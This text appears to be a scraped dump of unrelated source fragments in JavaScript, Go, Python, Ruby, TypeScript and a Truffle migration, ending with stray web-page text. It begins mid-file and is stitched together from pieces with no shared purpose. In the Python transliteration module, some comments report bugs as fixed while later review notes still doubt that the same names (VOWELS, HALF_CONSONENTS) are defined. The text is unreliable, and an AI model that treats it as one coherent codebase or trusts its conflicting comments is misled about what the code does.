    panel.onSearch.addListener((eventName, queryString) =>
    {
      if (panelWindow)
        panelWindow.postMessage({type: eventName, queryString}, "*");
    });
  }
})();
// +build darwin dragonfly freebsd js,wasm linux nacl netbsd openbsd solaris

// Package homedir detects the user's home directory without the use of cgo, for use in cross-compilation environments.
package homedir

// homeEnv is the environment variable holding the home directory on the
// Unix-like platforms selected by the build constraint above.
const homeEnv = "HOME"
<filename>lib/assets/javascripts/builder/editor/layers/layer-content-views/analyses/analysis-form-models/filter-form-model.js<gh_stars>0
var _ = require('underscore');
var BaseAnalysisFormModel = require('./base-analysis-form-model');
var template = require('./filter-form.tpl');
var ColumnData = require('builder/editor/layers/layer-content-views/analyses/column-data');
var ColumnRowData = require('builder/data/column-row-data');
var ColumnOptions = require('builder/editor/layers/layer-content-views/analyses/column-options');
var FILTER_TYPES = require('./filter-types');

// Index the filter type definitions by their `type` key for O(1) lookup
// (see _typeDef below). forEach instead of map: only the side effect is used.
var TYPE_TO_META_MAP = {};
FILTER_TYPES.forEach(function (d) {
  TYPE_TO_META_MAP[d.type] = d;
});

// Every comparison kind selectable for a range filter.
var FILTER_RANGE_KINDS = [
  { val: 'between', label: _t('editor.layers.filter-options.between') },
  { val: 'is-equal-to', label: _t('editor.layers.filter-options.is-equal-to') },
  { val: 'is-greater-than', label: _t('editor.layers.filter-options.is-greater-than') },
  { val: 'is-greater-or-equal-than', label: _t('editor.layers.filter-options.is-greater-or-equal-than') },
  { val: 'is-less-than', label: _t('editor.layers.filter-options.is-less-than') },
  { val: 'is-less-or-equal-than', label: _t('editor.layers.filter-options.is-less-or-equal-than') }
];

// Single-bound kinds: for these, the bound field is labelled plainly as
// "value" instead of min/max. Bug fix: the list previously contained
// 'is-less-than' twice and omitted 'is-greater-than', so greater-than
// filters showed a min/max label instead of "value".
var LESS_GREATER_KINDS = ['is-greater-or-equal-than', 'is-less-or-equal-than', 'is-less-than', 'is-greater-than'];
/**
 * Form model backing the "filter" analyses (filter-range / filter-category).
 * It keeps the form schema in sync with the selected source column: the
 * column's type drives both the analysis `type` and which parameter fields
 * (kind, bounds, text input, accept/reject) are shown.
 */
module.exports = BaseAnalysisFormModel.extend({
  defaults: {
    accept_reject: 'accept'
  },

  // Normalize persisted node attributes into form attributes; the
  // type-specific parsing is delegated to the matching filter type def.
  parse: function (attrs) {
    return _.defaults(
      _.pick(attrs, 'id', 'source', 'column'), // maintain default attrs
      this._typeDef(attrs.type).parse(attrs)
    );
  },

  initialize: function () {
    BaseAnalysisFormModel.prototype.initialize.apply(this, arguments);

    this._nodeDefModel = this._layerDefinitionModel.findAnalysisDefinitionNodeModel(this.get('source'));

    // Column statistics (used for the histogram of numeric columns).
    this._columnData = new ColumnData({
      column: this.get('column'),
      type: this._getSelectedColumnType()
    }, {
      nodeDefModel: this._nodeDefModel,
      configModel: this._configModel
    });

    // Distinct values of the selected column (feeds the text/select input).
    this._columnRowData = new ColumnRowData({
      column: this.get('column')
    }, {
      nodeDefModel: this._nodeDefModel,
      configModel: this._configModel
    });

    this._columnOptions = new ColumnOptions({}, {
      configModel: this._configModel,
      nodeDefModel: this._nodeDefModel
    });

    // Rebuild the schema whenever the inputs that shape it change.
    this.on('change:kind change:column', this._updateSchema, this);
    this.on('change:histogram_stats', this._setSchema, this);
    this.listenTo(this._columnOptions, 'columnsFetched', this._setSchema);
    this.listenTo(this._columnRowData, 'columnsFetched', this._setSchema);
    this.listenTo(this._columnData, 'columnsFetched', this._storeHistogramStats);

    this._columnData.fetch();
    this._columnRowData.fetch();

    this._setSchema();
  },

  getTemplate: function () {
    return template;
  },

  getTemplateData: function () {
    return {
      column: this.get('column'),
      histogram_stats: this.get('histogram_stats'),
      parametersDataFields: this._typeDef().getParameters(this.get('kind'), this.get('column'))
    };
  },

  // Let the type definition massage the raw form attrs before the base
  // class formats them for the analysis node.
  _formatAttrs: function (formAttrs) {
    var column = this.get('column');
    var customFormattedFormAttrs = this._typeDef().formatAttrs(formAttrs, column);
    return BaseAnalysisFormModel.prototype._formatAttrs.call(this, customFormattedFormAttrs);
  },

  /**
   * @override {BaseAnalysisFormModel.updateNodeDefinition}
   */
  updateNodeDefinition: function (nodeDefModel) {
    var attrs = this._formatAttrs(this.attributes);
    nodeDefModel.clear({ silent: true });
    nodeDefModel.set(attrs);
  },

  // Distinct column values, formatted as select options.
  _getInputOptions: function () {
    return _.map(this._columnRowData.getRows(), function (d) {
      return { label: d, val: d };
    });
  },

  // Build the (full) form schema, then filter it down to the fields that are
  // relevant for the current filter type/kind via _filterSchemaFieldsByType.
  _setSchema: function () {
    var requiredValidators = [{
      type: 'requiredBoolean'
    }];
    BaseAnalysisFormModel.prototype._setSchema.call(this, this._filterSchemaFieldsByType({
      source: this._primarySourceSchemaItem(_t('editor.layers.analysis-form.input')),
      column: {
        type: 'Select',
        text: _t('editor.layers.analysis-form.column'),
        options: this._columnOptions.filterByType(['string', 'number', 'boolean']),
        dialogMode: 'float',
        validators: ['required']
      },
      kind: {
        type: 'Select',
        title: _t('editor.layers.analysis-form.filter'),
        dialogMode: 'float',
        options: this._getKindOptions(),
        editorAttrs: {
          showSearch: false
        }
      },
      greater_than_or_equal: {
        type: 'Text',
        title: this._getMinOrEqualLabel(),
        validators: ['required'],
        editorAttrs: {
          placeholder: _t('editor.layers.analysis-form.write-min-or-equal-value')
        }
      },
      less_than_or_equal: {
        type: 'Text',
        title: this._getMaxOrEqualLabel(),
        validators: ['required'],
        editorAttrs: {
          placeholder: _t('editor.layers.analysis-form.write-max-or-equal-value')
        }
      },
      greater_than: {
        type: 'Text',
        title: this._getMinLabel(),
        validators: ['required'],
        editorAttrs: {
          placeholder: _t('editor.layers.analysis-form.write-min-value')
        }
      },
      less_than: {
        type: 'Text',
        title: this._getMaxLabel(),
        validators: ['required'],
        editorAttrs: {
          placeholder: _t('editor.layers.analysis-form.write-max-value')
        }
      },
      text: {
        type: this._getInputType(),
        title: _t('editor.layers.analysis-form.input'),
        validators: this._isBoolean() ? requiredValidators : ['required'],
        options: this._getInputOptions(),
        dialogMode: 'float',
        editorAttrs: {
          column: 'column',
          nodeDefModel: this._nodeDefModel,
          configModel: this._configModel,
          placeholder: _t('editor.layers.analysis-form.select-value')
        }
      },
      accept_reject: {
        type: 'Radio',
        title: _t('editor.layers.analysis-form.result'),
        options: [
          { label: _t('editor.layers.analysis-form.show'), val: 'accept' },
          { label: _t('editor.layers.analysis-form.hide'), val: 'reject' }
        ],
        validators: ['required']
      }
    }));

    this._generateHistogram();
    this._generateHistogramStats();
  },

  // Use a lazy select when distinct values are known, a free-text field otherwise.
  _getInputType: function () {
    var rows = this._columnRowData.getRows();
    return rows && rows.length ? 'LazySelect' : 'Text';
  },

  // Label helpers: single-bound kinds show a plain "value" label; the
  // 'between' style kinds show min/max variants.
  _getMinOrEqualLabel: function () {
    return _.contains(LESS_GREATER_KINDS, this.get('kind')) ? _t('editor.layers.analysis-form.value') : _t('editor.layers.analysis-form.min-or-equal');
  },

  _getMaxOrEqualLabel: function () {
    return _.contains(LESS_GREATER_KINDS, this.get('kind')) ? _t('editor.layers.analysis-form.value') : _t('editor.layers.analysis-form.max-or-equal');
  },

  _getMinLabel: function () {
    return _.contains(LESS_GREATER_KINDS, this.get('kind')) ? _t('editor.layers.analysis-form.value') : _t('editor.layers.analysis-form.min');
  },

  _getMaxLabel: function () {
    return _.contains(LESS_GREATER_KINDS, this.get('kind')) ? _t('editor.layers.analysis-form.value') : _t('editor.layers.analysis-form.max');
  },

  // Columns of the source node, as {val, label, type} option objects.
  _getSourceColumns: function () {
    var nodeDefModel = this._layerDefinitionModel.findAnalysisDefinitionNodeModel(this.get('source'));

    var sourceColumns = nodeDefModel.querySchemaModel.columnsCollection.map(function (columnModel) {
      var columnName = columnModel.get('name');
      return {
        val: columnName,
        label: columnName,
        type: columnModel.get('type')
      };
    });

    return sourceColumns;
  },

  _filterSchemaFieldsByType: function (schema) {
    // Always include the source and column fields in addition to the type-specific fields
    var kind = this.get('kind');
    var column = this.get('column');
    var fields = ['source', 'column'];
    var parameters = this._typeDef().getParameters(kind, column);

    if (parameters !== '') {
      fields = fields.concat(parameters.split(','));
    }

    return _.pick(schema, fields);
  },

  // Re-derive dependent state when the column or kind changes, then rebuild
  // the schema.
  _updateSchema: function () {
    var columnType = this._getSelectedColumnType();
    this._columnData.set({
      column: this.get('column'),
      type: columnType
    });
    this._columnRowData.set('column', this.get('column'));
    this._setType();
    this._setSchema();
  },

  // Type of the currently selected column, or null when it is not found.
  _getSelectedColumnType: function () {
    var columns = this._getSourceColumns();
    var columnType = null;

    for (var i in columns) {
      if (columns[i]['label'] === this.get('column')) {
        columnType = columns[i]['type'];
      }
    }

    return columnType;
  },

  // Range kinds are offered unless a category filter is active (except when
  // it still carries the 'is-equal-to' kind); otherwise returns undefined.
  _getKindOptions: function () {
    if (this.get('type') !== 'filter-category' || this.get('kind') === 'is-equal-to') {
      return FILTER_RANGE_KINDS;
    }
  },

  // Derive the analysis type (filter-range vs filter-category) and kind from
  // the selected column's type.
  _setType: function () {
    var columnType = this._getSelectedColumnType();
    var kind = this.get('kind');
    var attrs = {
      type: 'filter-range'
    };

    if (columnType === 'number' && kind === 'is-equal-to') {
      attrs.type = 'filter-category';
      attrs.accept_reject = 'accept';
    } else if (columnType === 'number') {
      attrs.kind = this._typeDef(attrs.type).getKind(kind);
    } else if (columnType === 'string') {
      attrs.kind = null;
      attrs.type = 'filter-category';
    } else if (columnType === 'boolean') {
      attrs.kind = 'is-boolean';
      attrs.type = 'filter-category';
    }

    this.set(attrs);
  },

  _isBoolean: function () {
    return this._getSelectedColumnType() === 'boolean';
  },

  _getColumnType: function (columnName) {
    var nodeDefModel = this._layerDefinitionModel.findAnalysisDefinitionNodeModel(this.get('source'));
    var column = nodeDefModel.querySchemaModel.columnsCollection.find(function (c) {
      return c.get('name') === columnName;
    }, this);
    return column && column.get('type');
  },

  _generateHistogramStats: function (data) {
    if (data) {
      this.trigger('onColData', this);
    }
  },

  // Cache histogram stats for numeric columns; clear them otherwise.
  _storeHistogramStats: function (data) {
    if (data && this._getSelectedColumnType() === 'number') {
      this.set('histogram_stats', data.attributes);
    } else {
      this.set('histogram_stats', null);
    }
  },

  // Ask the view layer to render a histogram for numeric columns.
  _generateHistogram: function () {
    var type;
    var tableName = this._getSourceOption()[0].layerName;
    var columnName = this.get('column');

    if (columnName) {
      type = this._getColumnType(columnName);
    }

    if (tableName && columnName && type === 'number') {
      this.trigger('generateHistogram', { columnName: columnName, tableName: tableName });
    }
  },

  // Meta definition for the given (or current) filter type.
  _typeDef: function (type) {
    type = type || this.get('type');
    return TYPE_TO_META_MAP[type];
  }
});
|
# coding=utf-8
from __future__ import unicode_literals
import cmu
import devnagri

# Devanagari consonant -> Telugu consonant.
REVERSE_CONSONENTS = {
    'ब': 'బ',
    'भ': 'భ',
    'ह': 'హ',
    'ङ': 'ఙ',
    'ग': 'గ',
    'घ': 'ఘ',
    'द': 'ద',
    'ध': 'ధ',
    'ज': 'జ',
    'झ': 'ఝ',
    'ड': 'డ',
    'ढ': 'ఢ',
    'प': 'ప',
    'फ': 'ఫ',
    'र': 'ర',
    'ऱ': 'ఱ',
    'क': 'క',
    'ख': 'ఖ',
    'त': 'త',
    'थ': 'థ',
    'च': 'చ',
    'छ': 'ఛ',
    'ट': 'ట',
    'ठ': 'ఠ',
    'म': 'మ',
    'ण': 'ణ',
    'न': 'న',
    'ऩ': 'న',
    'व': 'వ',
    'ऴ': 'ళ',
    'ल': 'ల',
    'ळ': 'ళ',
    'स': 'స',
    'श': 'శ',
    'ष': 'ష',
    'य': 'య',
    'य़': 'య',
}

# Telugu consonant -> Devanagari consonant (inverse; duplicate Telugu values
# keep the last Devanagari key, as before).
CONSONENTS = dict((v, k) for k, v in REVERSE_CONSONENTS.items())

# Telugu "half" consonants: the two-character consonant + virama (్)
# sequences. Bug fix: the original dict(t + '్' for t in CONSONENTS) split
# each two-character string into a {consonant: virama} mapping, so half
# forms were never matched by membership tests (is_consonent/add_vowel) and
# add_vowel's c[:-1] would strip the consonant itself. A set of the full
# sequences gives the intended semantics.
HALF_CONSONENTS = set(c + '్' for c in CONSONENTS)

# Devanagari independent vowel -> Telugu independent vowel.
REVERSE_VOWELS = {
    'अ': 'అ',
    'आ': 'ఆ',
    'इ': 'ఇ',
    'ई': 'ఈ',
    'उ': 'ఉ',
    'ऊ': 'ఊ',
    'ए': 'ఎ',
    'ऐ': 'ఐ',
    'ओ': 'ఓ',
    'औ': 'ఔ',
    'ऑ': 'ఆ',
}

# Telugu independent vowels; bug fix: is_vowel() referenced a VOWELS name
# that was never defined (NameError on first call).
VOWELS = set(REVERSE_VOWELS.values())

# Telugu independent vowel -> dependent (matra) form.
VOWELS_MATRA = {
    'అ': '',
    'ఆ': 'ా',
    'ఇ': 'ి',
    'ఈ': 'ీ',
    'ఉ': 'ు',
    'ఊ': 'ూ',
    'ఎ': 'ె',
    'ఏ': 'ే',
    'ఐ': 'ై',
    'ఓ': 'ో',
    'ఔ': 'ౌ',
    'అం': 'ం',
    'అః': 'ః',
}

# Devanagari matra -> Telugu matra.
REVERSE_VOWELS_MATRA = {
    '': '',
    'ा': 'ా',
    'ि': 'ి',
    'ी': 'ీ',
    'ु': 'ు',
    'ू': 'ూ',
    'े': 'ె',
    'ै': 'ై',
    'ो': 'ొ',
    'ौ': 'ౌ',
    'ॉ': 'ా',
    'ं': 'ం',
    'ः': 'ః',
}

# Telugu digits 0-9.
DIGITS = '౦౧౨౩౪౫౬౭౮౯'

# Combined Devanagari -> Telugu character table used by from_devnagri.
# Bug fix: previously REVERSE_MAPPING aliased REVERSE_CONSONENTS, so the
# update() calls below silently mutated the consonant table too; copy first.
REVERSE_MAPPING = dict(REVERSE_CONSONENTS)
REVERSE_MAPPING.update(REVERSE_VOWELS)
REVERSE_MAPPING.update(REVERSE_VOWELS_MATRA)
for i in range(10):
    # Map both ASCII and Devanagari digits to the Telugu digit.
    REVERSE_MAPPING[str(i)] = REVERSE_MAPPING[devnagri.DIGITS[i]] = DIGITS[i]
REVERSE_MAPPING['ऽ'] = 'ఽ'  # avagraha
REVERSE_MAPPING['्'] = '్'  # virama
def to_devnagri(text):
    """Transliterate Telugu *text* to Devanagari.

    Not implemented: currently a stub that returns None for every input.
    """
    pass
def from_devnagri(text):
    """Transliterate Devanagari *text* to Telugu, character by character.

    Characters without an entry in REVERSE_MAPPING pass through unchanged.
    """
    return "".join(REVERSE_MAPPING.get(ch, ch) for ch in text)
def is_vowel(l):
    """Return True if *l* is a Telugu independent vowel.

    NOTE(review): requires a module-level VOWELS container (presumably the
    set of Telugu vowels, i.e. the values of REVERSE_VOWELS) — confirm it is
    defined before this is called.
    """
    # print l, l in VOWELS
    return l in VOWELS
def is_consonent(l):
    """Return True if *l* is a Telugu consonant, in full or half form."""
    return any(l in table for table in (CONSONENTS, HALF_CONSONENTS))
def add_vowel(c, v):
    """Attach vowel *v* to consonant *c*, using the dependent (matra) form.

    NOTE(review): the HALF_CONSONENTS branch assumes c is a consonant +
    virama sequence whose last character (the virama) is stripped by c[:-1]
    before the matra is appended — verify that HALF_CONSONENTS actually
    contains such two-character sequences, otherwise c[:-1] loses the
    consonant itself.
    """
    # print "add_vowel", c, v
    if c in HALF_CONSONENTS:
        c = c[:-1]
    # print "add_vowel", c, v, c+VOWELS_MATRA.get(v, v)
    return c+VOWELS_MATRA.get(v, v)
def trans_text(text):
    """Transliterate *text* to Telugu by first converting it to Devanagari.

    Delegates to cmu.trans_text (semantics of visual=False are defined in
    the cmu module) and then maps the result with from_devnagri.
    """
    return from_devnagri(cmu.trans_text(text, visual=False))
def main():
    """CLI entry point: transliterate argv words and write them to out.txt.

    Each output line has the form "<word> => <transliteration>", UTF-8
    encoded. Bug fix: the original used the Python-2-only file() builtin
    (NameError on Python 3) and never closed the handle; io.open with an
    explicit encoding plus a context manager produces the same bytes on
    both Python 2 and 3 and always closes the file.
    """
    import io
    import sys

    words = sys.argv[1:]
    with io.open("out.txt", "w", encoding="utf-8") as output:
        for word in words:
            tel = trans_text(word)
            output.write(u"%s => %s\n" % (word, tel))


if __name__ == "__main__":
    main()
|
<filename>parsers/base_parser.rb
# Base class for simple line-oriented config parsers. Subclasses implement
# #parse_line to populate the options hash; parsed options are then readable
# as methods (via method_missing).
class BaseParser
  attr_accessor :options

  # Parses every line of +file+ (any enumerable of strings), stripping
  # surrounding whitespace first. Uses each (not map): only the side effect
  # of parse_line matters.
  def initialize(file)
    self.options = {}
    file.each { |line| parse_line(line.strip) }
  end

  private

  # Expose parsed options as reader methods, e.g. parser.port for
  # options['port'].
  def method_missing(name, *args, &block)
    method_name = name.to_s
    if self.options.has_key?(method_name)
      self.options[method_name]
    else
      raise NoMethodError, "config #{method_name} not found"
    end
  end

  # Keep respond_to? consistent with the method_missing lookup above.
  def respond_to_missing?(name, include_private = false)
    options.has_key?(name.to_s) || super
  end

  # Abstract hook: receives one stripped line. Bug fix: this was declared
  # with zero arity but is invoked with one argument from #initialize, so
  # callers got ArgumentError instead of the intended error.
  def parse_line(_line)
    raise 'not implemented'
  end
end
|
<gh_stars>10-100
package util
import (
"fmt"
"io"
"os"
)
// UniqueNonEmptyElementsOf returns the distinct non-empty strings of s in
// first-seen order. Fetched from https://gist.github.com/johnwesonga/6301924
func UniqueNonEmptyElementsOf(s []string) []string {
	unique := make(map[string]bool, len(s))
	// Preallocate for the worst case (all elements distinct and non-empty).
	// Bug fix: the original used make([]string, len(unique)), but len(unique)
	// is always zero at that point, so no capacity was ever reserved.
	us := make([]string, 0, len(s))
	for _, elem := range s {
		if len(elem) != 0 && !unique[elem] {
			us = append(us, elem)
			unique[elem] = true
		}
	}
	return us
}
// CopyFile fetched from https://opensource.com/article/18/6/copying-files-go
func CopyFile(src string, dst string) (int64, error) {
sourceFileStat, err := os.Stat(src)
if err != nil {
return 0, err
}
if !sourceFileStat.Mode().IsRegular() {
return 0, fmt.Errorf("%s is not a regular file", src)
}
source, err := os.Open(src)
if err != nil {
return 0, err
}
defer source.Close()
destination, err := os.Create(dst)
if err != nil {
return 0, err
}
defer destination.Close()
nBytes, err := io.Copy(destination, source)
return nBytes, err
}
|
/**
 * Route resolver: fetches the User identified by the `:id` route parameter
 * before the route activates. On a fetch error it redirects to /error and
 * completes with null so navigation is not left hanging.
 *
 * NOTE(review): paramMap.get can return null when the parameter is absent —
 * confirm getUserById tolerates that. Also, the catchError branch emits
 * null although the declared return type is Observable<User>; under
 * strictNullChecks this will not compile — consider Observable<User | null>.
 */
resolve(route: ActivatedRouteSnapshot, state: RouterStateSnapshot): Observable<User> {
  const userId = route.paramMap.get('id');
  return this.userDataService.getUserById(userId).pipe(
    catchError(error => {
      this.router.navigate(['/error']); // Redirect to error page if data fetching fails
      return of(null);
    })
  );
}
const Greeting = ({ name }) => (
<div>
<h1>Hello {name}!</h1>
</div>
); |
import cv2
import numpy as np
def display_images_with_labels(imgs_file: str, lbls_file: str) -> None:
    """Display each image from *imgs_file*, printing the matching label.

    Parameters:
        imgs_file: path to a .npy array of images (first axis indexes images).
        lbls_file: path to a .npy array of labels, parallel to the images.

    Shows one image at a time; any key press advances to the next.
    Robustness fix: cv2.destroyAllWindows() now runs in a finally block, so
    the OpenCV windows are closed even if loading or display fails mid-loop
    (previously a mismatched labels array or imshow error left them open).
    """
    imgs = np.load(imgs_file)
    lbls = np.load(lbls_file)
    try:
        for i in range(imgs.shape[0]):
            print(lbls[i])
            cv2.imshow('img', imgs[i])
            cv2.waitKey(0)  # Wait for a key press to display the next image
    finally:
        cv2.destroyAllWindows()  # Close all OpenCV windows after displaying all images
# Example usage
display_images_with_labels('test_set_ck_extended_no_resize.npy', 'test_labels_ck_extended_no_resize.npy') |
const BN = require('web3-utils').BN;
const {toWei} = require('web3-utils');
const {QualifyingGameSalePayoutWallet} = require('../src/constants');
const REVVSale = artifacts.require('REVVSale.sol');
const REVV = artifacts.require('REVV.sol');
const DeltaTimeInventory = artifacts.require('DeltaTimeInventory.sol');
module.exports = async (deployer, network, [owner]) => {
const revv = await REVV.deployed();
const inventory = await DeltaTimeInventory.deployed();
await deployer.deploy(REVVSale, revv.address, inventory.address, QualifyingGameSalePayoutWallet, {from: owner});
const sale = await REVVSale.deployed();
await revv.whitelistOperator(sale.address, true, {from: owner});
};
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.